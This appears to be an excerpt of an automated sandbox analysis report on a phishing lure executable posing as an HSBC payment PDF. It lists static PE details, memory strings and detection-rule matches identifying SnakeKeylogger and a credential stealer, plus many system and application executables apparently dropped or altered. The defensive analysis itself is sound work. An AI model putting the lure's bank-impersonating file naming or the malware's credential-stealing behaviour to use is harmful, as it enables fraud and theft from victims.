Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 3_3_021C20B4	3_3_021C20B4

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: String function: 00428900 appears 42 times
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: String function: 00420AE3 appears 70 times
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: String function: 022073B8 appears 36 times

Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3

Source: firefox.exe.3.dr	Static PE information: Number of sections : 11 > 10
Source: elevation_service.exe0.1.dr	Static PE information: Number of sections : 12 > 10
Source: identity_helper.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Number of sections : 11 > 10
Source: setup.exe.3.dr	Static PE information: Number of sections : 13 > 10
Source: msedgewebview2.exe.3.dr	Static PE information: Number of sections : 14 > 10

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1378494141.0000000004E8D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1376425154.0000000004CE3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1347543575.0000000004160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1319502470.0000000003E90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1378025938.0000000004150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemaintenanceservice.exe0 vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1322804287.0000000003E90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7744, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
